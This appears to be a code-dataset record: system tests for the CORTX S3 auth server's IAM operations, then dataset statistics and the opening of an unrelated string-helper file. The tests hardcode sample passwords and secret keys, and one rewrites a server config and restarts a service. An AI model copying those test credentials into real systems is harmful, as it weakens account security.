result = AuthTest(test_msg).delete_saml_provider(**saml_provider_args).execute_test()
result.command_response_should_have("SAML provider deleted.")
test_msg = 'List SAML providers'
result = AuthTest(test_msg).list_saml_providers(**saml_provider_args).execute_test()
result.command_should_match_pattern("")
def get_federation_token_test():
federation_token_args = {}
federation_token_args['Name'] = 's3root'
test_msg = 'Get Federation Token'
response_pattern = "FederatedUserId = [\S]*, AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, SessionToken = [\w/+]*$"
result = AuthTest(test_msg).get_federation_token(**federation_token_args).execute_test()
result.command_should_match_pattern(response_pattern)
response_elements = get_response_elements(result.status.stdout)
S3ClientConfig.access_key_id = response_elements['AccessKeyId']
S3ClientConfig.secret_key = response_elements['SecretAccessKey']
S3ClientConfig.token = response_elements['SessionToken']
_use_root_credentials()
test_msg = 'Delete access key'
access_key_args = {}
access_key_args['AccessKeyId'] = response_elements['AccessKeyId']
result = AuthTest(test_msg).delete_access_key(**access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
test_msg = 'Delete User s3root'
user_args = {}
user_args['UserName'] = "s3root"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
def delete_account_tests():
_use_root_credentials()
test_msg = "Create User s3user1 (default path)"
user_args = {'UserName': 's3user1'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
AuthTest(test_msg).create_user(**user_args).execute_test()\
.command_should_match_pattern(user1_response_pattern)
account_args = {'AccountName': 's3test'}
test_msg = "Delete account s3test should fail"
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)\
.command_response_should_have("attempted to delete a resource that has attached subordinate entities")
# Test: create a account s3test1 and try to delete account s3test1 using access
# key and secret key of account s3test. Account delete operation should fail.
test_msg = "Create account s3test1"
account_args = {'AccountName': 's3test1', 'Email': 's3test1@seagate.com', 'ldapuser': S3ClientConfig.ldapuser, 'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result = AuthTest(test_msg).create_account(**account_args).execute_test()
result.command_should_match_pattern(account_response_pattern)
account_response_elements = get_response_elements(result.status.stdout)
s3test1_root_access_key = account_response_elements['AccessKeyId']
s3test1_root_secret_key = account_response_elements['SecretKey']
test_msg = "Delete account s3test1 using credentials of account s3test should fail."
account_args = {'AccountName': 's3test1'}
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)\
.command_response_should_have("You are not authorized to perform this operation.")
# Test: delete account s3test with force option [recursively/forcefully]
test_msg = "Delete account s3test"
account_args = {'AccountName': 's3test', 'force': True}
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
# Use invalid access key and secret key of account s3test1
GlobalTestState.root_access_key = "xRZ807dxQEqakueNTBpyNQ#"
GlobalTestState.root_secret_key = "caEE2plJfA1BrhthYsh9H9siEQZtCMF4etvj1o9B"
_use_root_credentials()
# Test: delete account with invalid access key and secret key format
test_msg = "Delete account s3test1 with invalid access key format"
account_args = {'AccountName': 's3test1'}
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True) \
.command_response_should_have("The AWS access key Id you provided does not exist in our records.")
# Use access key and secret key of account s3test1
GlobalTestState.root_access_key = s3test1_root_access_key
GlobalTestState.root_secret_key = s3test1_root_secret_key
_use_root_credentials()
# Test: delete account without force option
test_msg = "Delete account s3test1"
account_args = {'AccountName': 's3test1'}
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
# Test: Account cannot be deleted if it contains some buckets
test_msg = "Create account s3test1"
account_args = {'AccountName': 's3test1', 'Email': 's3test1@seagate.com', 'ldapuser': S3ClientConfig.ldapuser, 'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result = AuthTest(test_msg).create_account(**account_args).execute_test()
result.command_should_match_pattern(account_response_pattern)
account_response_elements = get_response_elements(result.status.stdout)
GlobalTestState.root_access_key = account_response_elements['AccessKeyId']
GlobalTestState.root_secret_key = account_response_elements['SecretKey']
_use_root_credentials()
S3ClientConfig.pathstyle = False
S3cmdTest('s3cmd can create bucket').with_credentials(GlobalTestState.root_access_key, GlobalTestState.root_secret_key)\
.create_bucket("seagatebucket").execute_test().command_is_successful()
test_msg = "Delete account s3test1 containing buckets"
account_args = {'AccountName': 's3test1'}
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)\
.command_response_should_have("Account cannot be deleted as it owns some resources.")
S3cmdTest('s3cmd can delete bucket').with_credentials(GlobalTestState.root_access_key, GlobalTestState.root_secret_key)\
.delete_bucket("seagatebucket").execute_test().command_is_successful()
# Test: Account cannot be deleted on motr_idx_op fail
test_msg = "Cannot delete account s3test1 on motr_idx_op fail"
S3fiTest('s3cmd can enable FI motr_idx_op_fail').\
enable_fi("enable", "always", "motr_idx_op_fail").\
execute_test().command_is_successful()
account_args = {'AccountName': 's3test1'}
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)\
.command_response_should_have("Account cannot be deleted")
S3fiTest('s3cmd disable Fault injection').\
disable_fi("motr_idx_op_fail").\
execute_test().command_is_successful()
test_msg = "Delete account s3test1 contains no buckets"
account_args = {'AccountName': 's3test1'}
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
def reset_account_accesskey_tests():
test_msg = "Create account s3test1"
account_args = {'AccountName': 's3test1', 'Email': 's3test1@seagate.com', 'ldapuser': S3ClientConfig.ldapuser, 'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result = AuthTest(test_msg).create_account(**account_args).execute_test()
result.command_should_match_pattern(account_response_pattern)
account_response_elements = get_response_elements(result.status.stdout)
s3test1_root_access_key = account_response_elements['AccessKeyId']
s3test1_root_secret_key = account_response_elements['SecretKey']
# Use access key and secret key of account s3test1
GlobalTestState.root_access_key = s3test1_root_access_key
GlobalTestState.root_secret_key = s3test1_root_secret_key
_use_root_credentials()
S3ClientConfig.pathstyle = False
# Create a bucket with just now created Account credentials
S3cmdTest('s3cmd can create bucket').with_credentials(GlobalTestState.root_access_key, GlobalTestState.root_secret_key)\
.create_bucket("seagatebucket").execute_test().command_is_successful()
test_msg = "Reset account access key"
account_args = {'AccountName': 's3test1', 'ldapuser': S3ClientConfig.ldapuser, 'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result = AuthTest(test_msg).reset_account_accesskey(**account_args).execute_test()
result.command_should_match_pattern(account_response_pattern)
account_response_elements = get_response_elements(result.status.stdout)
s3test1_root_access_key = account_response_elements['AccessKeyId']
s3test1_root_secret_key = account_response_elements['SecretKey']
test_msg = "Reset account access key with invalid credentials"
account_args = {'AccountName': 's3test1', 'ldapuser': 'sgiamadmin*',
'ldappasswd': 'ldapadmin@'}
result = AuthTest(test_msg).reset_account_accesskey(**account_args).execute_test(negative_case=True)
result.command_should_match_pattern("Account access key wasn't reset.")
#Using old access key should fail now
S3cmdTest('s3cmd can delete bucket').with_credentials(GlobalTestState.root_access_key, GlobalTestState.root_secret_key)\
.delete_bucket("seagatebucket").execute_test(negative_case=True).command_should_fail().command_error_should_have("")
# Use new access key and secret key of account s3test1
GlobalTestState.root_access_key = s3test1_root_access_key
GlobalTestState.root_secret_key = s3test1_root_secret_key
_use_root_credentials()
# Using new access key should pass now
S3cmdTest('s3cmd can delete bucket').with_credentials(GlobalTestState.root_access_key,
GlobalTestState.root_secret_key) \
.delete_bucket("seagatebucket").execute_test().command_is_successful()
test_msg = "Delete account s3test1"
account_args = {'AccountName': 's3test1'}
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
# Limit on Maximum number of credentials for Account which should not exceed two, should not count temporary credentials of account.
#Create account
test_msg = "Create account tempAuthTestAccount"
account_args = {'AccountName': 'tempAuthTestAccount', 'Email': 'tempAuthTestAccount@seagate.com', \
'ldapuser': S3ClientConfig.ldapuser, \
'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result1 = AuthTest(test_msg).create_account(**account_args).execute_test()
result1.command_should_match_pattern(account_response_pattern)
account_response_elements = get_response_elements(result1.status.stdout)
access_key_args = {}
access_key_args['AccountName'] = "tempAuthTestAccount"
access_key_args['AccessKeyId'] = account_response_elements['AccessKeyId']
access_key_args['SecretAccessKey'] = account_response_elements['SecretKey']
s3test_access_key = S3ClientConfig.access_key_id
s3test_secret_key = S3ClientConfig.secret_key
S3ClientConfig.access_key_id = access_key_args['AccessKeyId']
S3ClientConfig.secret_key = access_key_args['SecretAccessKey']
#Create Account LoginProfile for tempAuthTestAccount"
test_msg = 'create account login profile should succeed.'
account_profile_response_pattern = "Account Login Profile: CreateDate = [\s\S]*, PasswordResetRequired = false, AccountName = [\s\S]*"
user_args = {}
account_name_flag = "-n"
password_flag = "--password"
user_args['AccountName'] ="tempAuthTestAccount"
user_args['Password'] = "accountpassword"
result = AuthTest(test_msg).create_account_login_profile(account_name_flag , password_flag,\
**user_args).execute_test()
result.command_should_match_pattern(account_profile_response_pattern)
date_pattern_for_tempAuthCred = "[0-9]{4}-(0[1-9]|1[0-2])-(0[1-9]|[1-2][0-9]|3[0-1])T(2[0-3]|[01][0-9]):[0-5][0-9]:[0-5][0-9].[0-9]*[\+-][0-9]*"
#Get Temp Auth Credentials for account for account
access_key_args['Password'] = "accountpassword"
test_msg = 'GetTempAuthCredentials success'
account_name_flag = "-a"
password_flag = "--password"
response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, ExpiryTime = "+date_pattern_for_tempAuthCred+", SessionToken = [\w/+]*$"
result = AuthTest(test_msg).get_temp_auth_credentials(account_name_flag, password_flag ,**access_key_args).execute_test()
result.command_should_match_pattern(response_pattern)
#Get Temp Auth Credentials for account for account
access_key_args['Password'] = "accountpassword"
test_msg = 'GetTempAuthCredentials success'
account_name_flag = "-a"
password_flag = "--password"
response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, ExpiryTime = "+date_pattern_for_tempAuthCred+", SessionToken = [\w/+]*$"
result = AuthTest(test_msg).get_temp_auth_credentials(account_name_flag, password_flag ,**access_key_args).execute_test()
result.command_should_match_pattern(response_pattern)
#create access key(after this maximum limit of access key creation has met)
accesskey_response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, Status = [\w]*$"
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
#create access key(after this maximum limit of access key creation has met)
accesskey_response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, Status = [\w]*$"
result = AuthTest(test_msg).create_access_key(**access_key_args).execute_test(negative_case=True)
result.command_response_should_have("AccessKeyQuotaExceeded")
#Delete account
test_msg = "Delete account tempAuthTestAccount"
account_args = {'AccountName': 'tempAuthTestAccount', 'Email': 'tempAuthTestAccount@seagate.com', 'force': True}
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
S3ClientConfig.access_key_id = s3test_access_key
S3ClientConfig.secret_key = s3test_secret_key
def auth_health_check_tests():
# e.g curl -s -I -X HEAD https://iam.seagate.com:9443/auth/health
health_check_uri = "/auth/health"
result = AuthTest('Auth server health check').get_auth_health(health_check_uri).\
execute_test().command_is_successful().command_response_should_have("200 OK")
# Validate maxAccount and maxUser limit values from authserver.properties file
def test_max_account_and_user_limit_value_of_auth_config():
print("Updating autherver.properties (/opt/seagate/cortx/auth/resources/authserver.properties) file with test values..")
s3confstore = S3CortxConfStore('properties:///opt/seagate/cortx/auth/resources/authserver.properties', 'index')
old_maxAccountValue=s3confstore.get_config('maxAccountLimit')
old_maxIAMUserValue=s3confstore.get_config('maxIAMUserLimit')
s3confstore.set_config('maxAccountLimit', '1', True)
s3confstore.set_config('maxIAMUserLimit', '1', True)
os.system('systemctl restart s3authserver')
time.sleep(1) # sometime authserver takes more time to restart
print("auth config values are changed successfully..")
# Try to create two account and it should with MaxAccountLimitExceeded error.
test_msg = "Create account authconfigValidatorAccount1 should successfull."
account_args = {'AccountName': 'authconfigValidatorAccount1', 'Email': 'authconfigValidatorAccount1@seagate.com', \
'ldapuser': S3ClientConfig.ldapuser, \
'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result = AuthTest(test_msg).create_account(**account_args).execute_test()
result.command_should_match_pattern(account_response_pattern)
account_response_elements = get_response_elements(result.status.stdout)
access_key_args = {}
access_key_args['AccountName'] = "authconfigValidatorAccount1"
access_key_args['AccessKeyId'] = account_response_elements['AccessKeyId']
access_key_args['SecretAccessKey'] = account_response_elements['SecretKey']
test_msg = "Create account authconfigValidatorAccount2 should fail with MaxAccountLimitExceeded with limit as 1."
account_args = {'AccountName': 'authconfigValidatorAccount2', 'Email': 'authconfigValidatorAccount2@seagate.com', \
'ldapuser': S3ClientConfig.ldapuser, \
'ldappasswd': S3ClientConfig.ldappasswd}
result = AuthTest(test_msg).create_account(**account_args).execute_test(negative_case=True)
result.command_response_should_have("MaxAccountLimitExceeded")
test_access_key = S3ClientConfig.access_key_id
test_secret_key = S3ClientConfig.secret_key
# Test IAM User limit
S3ClientConfig.access_key_id = access_key_args['AccessKeyId']
S3ClientConfig.secret_key = access_key_args['SecretAccessKey']
test_msg = "Create User s3user1 in authconfigValidatorAccount1 should successful."
user_args = {'UserName': 's3user1'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
AuthTest(test_msg).create_user(**user_args).execute_test()\
.command_should_match_pattern(user1_response_pattern)
test_msg = "Create User s3user2 in authconfigValidatorAccount1 should fail with MaxUserLimitExceeded with limit as 1."
user_args = {'UserName': 's3user2'}
AuthTest(test_msg).create_user(**user_args).execute_test(negative_case=True)\
.command_response_should_have("MaxUserLimitExceeded")
# cleanup delete iam user
test_msg = "Delete User s3user1 should successfull."
user_args = {}
user_args['UserName'] = "s3user1"
AuthTest(test_msg).delete_user(**user_args).execute_test()\
.command_response_should_have("User deleted.")
# Delete account
test_msg = 'Delete Account should successfull.'
account_args = {}
account_args['AccountName'] = access_key_args['AccountName']
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
# Restore config paramters
S3ClientConfig.access_key_id = test_access_key
S3ClientConfig.secret_key = test_secret_key
s3confstore.set_config('maxAccountLimit', old_maxAccountValue, True)
s3confstore.set_config('maxIAMUserLimit', old_maxIAMUserValue, True)
os.system('systemctl restart s3authserver')
time.sleep(1) # sometime authserver takes more time to restart
print("Reverted authserver.properties (/opt/seagate/cortx/auth/resources/authserver.properties) with origional values successfully...")
# Validate delete account functionality with ldap credentials
def delete_acc_ldap_cred_tests():
# DeleteAccount with ldap credentials tests -- starts
test_access_key = S3ClientConfig.access_key_id
test_secret_key = S3ClientConfig.secret_key
test_msg = "Create account s3deletetest for testing Account Deletion with ldap credentials"
account_args = {'AccountName': 's3deletetest', 'Email': 's3deletetest@seagate.com', 'ldapuser': S3ClientConfig.ldapuser, 'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
AuthTest(test_msg).create_account(**account_args).execute_test()\
.command_should_match_pattern(account_response_pattern)
test_msg = 'DeleteAccount should fails with InvalidAccessKeyId error with wrong ldapadmin username i.e. dummyUser'
account_args = {}
account_args['AccountName'] ="s3deletetest"
S3ClientConfig.access_key_id = "dummyUser"
S3ClientConfig.secret_key = S3ClientConfig.ldappasswd
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)\
.command_response_should_have("InvalidAccessKeyId")
test_msg = 'DeleteAccount should fails with InvalidAccessKeyId error with empty ldapadmin username'
account_args = {}
account_args['AccountName'] ="s3deletetest"
S3ClientConfig.access_key_id = ""
S3ClientConfig.secret_key = S3ClientConfig.ldappasswd
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)\
.command_response_should_have("InvalidAccessKeyId")
test_msg = 'DeleteAccount should fails with SignatureDoesNotMatch error with invalid ldappassword i.e. dummykey'
account_args = {}
account_args['AccountName'] ="s3deletetest"
S3ClientConfig.access_key_id = S3ClientConfig.ldapuser
S3ClientConfig.secret_key = "dummykey"
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)\
.command_response_should_have("SignatureDoesNotMatch")
test_msg = 'DeleteAccount should fails with SignatureDoesNotMatch error with empty ldappassword'
account_args = {}
account_args['AccountName'] ="s3deletetest"
S3ClientConfig.access_key_id = S3ClientConfig.ldapuser
S3ClientConfig.secret_key = ""
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)\
.command_response_should_have("SignatureDoesNotMatch")
test_msg = 'DeleteAccount Successfull with ldap credentials'
account_args = {}
account_args['AccountName'] ="s3deletetest"
S3ClientConfig.access_key_id = S3ClientConfig.ldapuser
S3ClientConfig.secret_key = S3ClientConfig.ldappasswd
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
S3ClientConfig.access_key_id = test_access_key
S3ClientConfig.secret_key = test_secret_key
ldap_user_name = S3ClientConfig.ldapuser
ldap_user_passwd = S3ClientConfig.ldappasswd
test_msg = "Create account s3deletetest1 for testing Account Deletion scnearios with ldap credentials"
account_args = {'AccountName': 's3deletetest1', 'Email': 's3deletetest@seagate.com', 'ldapuser': S3ClientConfig.ldapuser, 'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result = AuthTest(test_msg).create_account(**account_args).execute_test()\
.command_should_match_pattern(account_response_pattern)
response_elements = get_response_elements(result.status.stdout)
accesskey = response_elements['AccessKeyId']
secretkey = response_elements['SecretKey']
os.environ["AWS_ACCESS_KEY_ID"] = accesskey
os.environ["AWS_SECRET_ACCESS_KEY"] = secretkey
AwsTest('Aws can create bucket').create_bucket("tbucket").execute_test().command_is_successful()
test_msg = 'DeleteAccount should fails with AccountNotEmpty error with ldap credentials'
account_args = {}
account_args['AccountName'] ="s3deletetest1"
S3ClientConfig.access_key_id = S3ClientConfig.ldapuser
S3ClientConfig.secret_key = S3ClientConfig.ldappasswd
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)\
.command_response_should_have("AccountNotEmpty")
S3ClientConfig.access_key_id = accesskey
S3ClientConfig.secret_key = secretkey
# Delete bucket with account access key
AwsTest('Aws can delete bucket').delete_bucket("tbucket").execute_test().command_is_successful()
# create IAM User and try to delete account
test_msg = "Create User s3user1 (default path)"
user_args = {'UserName': 's3user1'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
# Try to delete account
test_msg = 'DeleteAccount should fails with DeleteConflict error with ldap credentials with IAM user as sub-resource'
account_args = {}
account_args['AccountName'] ="s3deletetest1"
S3ClientConfig.access_key_id = S3ClientConfig.ldapuser
S3ClientConfig.secret_key = S3ClientConfig.ldappasswd
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)\
.command_response_should_have("DeleteConflict")
S3ClientConfig.access_key_id = accesskey
S3ClientConfig.secret_key = secretkey
test_msg = 'Delete User s3user1'
user_args = {}
user_args['UserName'] = "s3user1"
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
test_msg = 'DeleteAccount Successfull with ldap credentials'
account_args = {}
account_args['AccountName'] ="s3deletetest1"
S3ClientConfig.access_key_id = S3ClientConfig.ldapuser
S3ClientConfig.secret_key = S3ClientConfig.ldappasswd
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
# DeleteAccount fail if account has bucket/iam-users -- end
# Restore config paramters
S3ClientConfig.access_key_id = test_access_key
S3ClientConfig.secret_key = test_secret_key
S3ClientConfig.ldapuser = ldap_user_name
S3ClientConfig.ldappasswd = ldap_user_passwd
del os.environ["AWS_ACCESS_KEY_ID"]
del os.environ["AWS_SECRET_ACCESS_KEY"]
# DeleteAccount fails with IAM credentials/temp auth credentials of IAM User --- start
date_pattern_for_tempAuthCred = "[0-9]{4}-(0[1-9]|1[0-2])-(0[1-9]|[1-2][0-9]|3[0-1])T(2[0-3]|[01][0-9]):[0-5][0-9]:[0-5][0-9].[0-9]*[\+-][0-9]*"
test_msg = "Create account tempAuthDeleteAccount"
account_args = {'AccountName': 'tempAuthDeleteAccount', 'Email': 'tempAuthDeleteAccount@seagate.com', \
'ldapuser': S3ClientConfig.ldapuser, \
'ldappasswd': S3ClientConfig.ldappasswd}
account_response_pattern = "AccountId = [\w-]*, CanonicalId = [\w-]*, RootUserName = [\w+=,.@-]*, AccessKeyId = [\w-]*, SecretKey = [\w/+]*$"
result1 = AuthTest(test_msg).create_account(**account_args).execute_test()
result1.command_should_match_pattern(account_response_pattern)
account_response_elements = get_response_elements(result1.status.stdout)
acc_access_key_args = {}
acc_access_key_args['AccountName'] = "tempAuthDeleteAccount"
acc_access_key_args['AccessKeyId'] = account_response_elements['AccessKeyId']
acc_access_key_args['SecretAccessKey'] = account_response_elements['SecretKey']
S3ClientConfig.access_key_id = acc_access_key_args['AccessKeyId']
S3ClientConfig.secret_key = acc_access_key_args['SecretAccessKey']
test_msg = "Create User s3user1 (default path)"
user_args = {'UserName': 's3user1'}
user1_response_pattern = "UserId = [\w-]*, ARN = [\S]*, Path = /$"
result = AuthTest(test_msg).create_user(**user_args).execute_test()
result.command_should_match_pattern(user1_response_pattern)
test_msg = 'Create access key (user name is s3user1) using account credentials.'
accesskey_response_elements = {}
iam_access_key_args = {}
iam_access_key_args['UserName'] = 's3user1'
accesskey_response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, Status = [\w]*$"
result = AuthTest(test_msg).create_access_key(**iam_access_key_args).execute_test()
result.command_should_match_pattern(accesskey_response_pattern)
accesskey_response_elements = get_response_elements(result.status.stdout)
iam_access_key_args['AccessKeyId'] = accesskey_response_elements['AccessKeyId']
iam_access_key_args['SecretAccessKey'] = accesskey_response_elements['SecretAccessKey']
# Test DeleteAccount should fail with IAM user credentials
test_msg = 'DeleteAccount tempAuthDeleteAccount should fails with InvalidUser error with IAM user access key'
account_args = {}
account_args['AccountName'] ="tempAuthDeleteAccount"
S3ClientConfig.access_key_id = iam_access_key_args['AccessKeyId']
S3ClientConfig.secret_key = iam_access_key_args['SecretAccessKey']
AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)\
.command_response_should_have("InvalidUser")
date_pattern = "[0-9]{4}-(0[1-9]|1[0-2])-(0[1-9]|[1-2][0-9]|3[0-1]) (2[0-3]|[01][0-9]):[0-5][0-9]:[0-5][0-9][\+-][0-9]*:[0-9]*"
test_msg = 'Create UserLoginProfile for user s3user1 should succeed.'
user_args = {}
user_name_flag = "-n"
password_flag = "--password"
user_args['UserName'] ="s3user1"
user_args['Password'] ="abcdefg"
S3ClientConfig.access_key_id = acc_access_key_args['AccessKeyId']
S3ClientConfig.secret_key = acc_access_key_args['SecretAccessKey']
login_profile_response_pattern = "Login Profile "+date_pattern+" False "+user_args['UserName']
result = AuthTest(test_msg).create_login_profile(user_name_flag , password_flag,\
**user_args).execute_test()
result.command_should_match_pattern(login_profile_response_pattern)
#Get Temp Auth Credentials for IAM user s3user1
user_access_key_args = {}
user_args['AccountName'] = acc_access_key_args['AccountName']
test_msg = 'Generate GetTempAuthCredentials for IAM User s3user1'
account_name_flag = "-a"
password_flag = "--password"
response_pattern = "AccessKeyId = [\w-]*, SecretAccessKey = [\w/+]*, ExpiryTime = "+date_pattern_for_tempAuthCred+", SessionToken = [\w/+]*$"
result = AuthTest(test_msg).get_temp_auth_credentials(account_name_flag, password_flag ,**user_args).execute_test()
result.command_should_match_pattern(response_pattern)
response_elements = get_response_elements(result.status.stdout)
user_access_key_args['AccessKeyId'] = response_elements['AccessKeyId']
user_access_key_args['SecretAccessKey'] = response_elements['SecretAccessKey']
user_access_key_args['SessionToken'] = response_elements['SessionToken']
# Test DeleteAccount with IAM user temp credentials should fail.
test_msg = 'DeleteAccount should fails with InvalidUser error by using IAM user temporary credentials'
account_args = {}
account_args['AccountName'] =acc_access_key_args['AccountName']
S3ClientConfig.access_key_id = user_access_key_args['AccessKeyId']
S3ClientConfig.secret_key = user_access_key_args['SecretAccessKey']
S3ClientConfig.token = user_access_key_args['SessionToken']
result =AuthTest(test_msg).delete_account(**account_args).execute_test(negative_case=True)
result.command_response_should_have("InvalidUser")
S3ClientConfig.access_key_id = acc_access_key_args['AccessKeyId']
S3ClientConfig.secret_key = acc_access_key_args['SecretAccessKey']
test_msg = 'Delete IAM users temporary access key for s3user1 should successful.'
user_access_key_args['userName'] = iam_access_key_args['UserName']
result = AuthTest(test_msg).delete_access_key(**user_access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
test_msg = 'Delete IAM users access key for s3user1 should successful.'
user_access_key_args['AccessKeyId'] = iam_access_key_args['AccessKeyId']
S3ClientConfig.token = ""
result = AuthTest(test_msg).delete_access_key(**user_access_key_args).execute_test()
result.command_response_should_have("Access key deleted.")
test_msg = 'Delete User s3user1 using account credentials should successful.'
user_args = {}
user_args['UserName'] = iam_access_key_args['UserName']
S3ClientConfig.access_key_id = acc_access_key_args['AccessKeyId']
S3ClientConfig.secret_key = acc_access_key_args['SecretAccessKey']
result = AuthTest(test_msg).delete_user(**user_args).execute_test()
result.command_response_should_have("User deleted.")
# Test if DeleteAccount successful or not.
test_msg = 'DeleteAccount Successfull with ldap credentials'
account_args = {}
account_args['AccountName'] =acc_access_key_args['AccountName']
S3ClientConfig.access_key_id = S3ClientConfig.ldapuser
S3ClientConfig.secret_key = S3ClientConfig.ldappasswd
AuthTest(test_msg).delete_account(**account_args).execute_test()\
.command_response_should_have("Account deleted successfully")
# DeleteAccount fails with IAM credentials/temp auth credentials of IAM User --- end
# Restore config paramters
S3ClientConfig.access_key_id = test_access_key
S3ClientConfig.secret_key = test_secret_key
S3ClientConfig.ldapuser = ldap_user_name
S3ClientConfig.ldappasswd = ldap_user_passwd
def execute_all_system_tests():
if Config.no_ssl :
print('Executing auth system tests over HTTP connection')
else:
print('Executing auth system tests over HTTPS connection')
# Do not change the order.
before_all()
test_max_account_and_user_limit_value_of_auth_config()
account_tests()
user_tests()
accesskey_tests()
role_tests()
saml_provider_tests()
get_federation_token_test()
delete_account_tests()
reset_account_accesskey_tests()
auth_health_check_tests()
delete_acc_ldap_cred_tests()
if __name__ == '__main__':
execute_all_system_tests()
| 51.760308
| 166
| 0.739327
| 13,597
| 114,235
| 5.871075
| 0.046554
| 0.05389
| 0.042278
| 0.049193
| 0.837352
| 0.796415
| 0.76253
| 0.73908
| 0.712611
| 0.687733
| 0
| 0.010844
| 0.147547
| 114,235
| 2,206
| 167
| 51.783772
| 0.808924
| 0.05557
| 0
| 0.650474
| 0
| 0.018957
| 0.300751
| 0.044139
| 0
| 0
| 0
| 0.000907
| 0
| 1
| 0.010664
| false
| 0.151659
| 0.008886
| 0
| 0.021919
| 0.003555
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
ab11331e515ffea6783cb84c6738e5f7dd0f2cbc
| 40,598
|
py
|
Python
|
translator/functions.py
|
SDM-TIB/ISWC2020RMLFnQ
|
aa39a37c86fd56987da5985008f2fb0df6aed955
|
[
"Apache-2.0"
] | 2
|
2020-09-10T21:25:20.000Z
|
2021-01-06T14:46:23.000Z
|
translator/functions.py
|
SDM-TIB/FunMap
|
aa39a37c86fd56987da5985008f2fb0df6aed955
|
[
"Apache-2.0"
] | 5
|
2020-08-06T13:09:48.000Z
|
2021-01-09T18:24:47.000Z
|
translator/functions.py
|
SDM-TIB/ISWC2020RMLFnQ
|
aa39a37c86fd56987da5985008f2fb0df6aed955
|
[
"Apache-2.0"
] | 3
|
2020-08-26T23:12:09.000Z
|
2021-01-09T17:56:18.000Z
|
import re
import csv
import sys
import os
import pandas as pd
global columns
columns = {}
# returns a string in lower case
def tolower(value):
return value.lower()
# return a string in upper case
def toupper(value):
return value.upper()
# return a string in title case
def totitle(value):
return value.title()
# return a string after removing leading and trailing whitespaces
def trim(value):
return value.strip()
# return a string without s2
def chomp(value, toremove):
return value.replace(toremove, '')
#return the substring (index2 can be null, index2 can be negative value)
def substring(value, index1, index2):
if index2 is None:
return value[int(index1):]
else:
return value[int(index1):int(index2)]
#replace value2 by value3
def replaceValue(value, value2, value3):
return value.replace(value2, value3)
#returns the first appearance of the regex in value
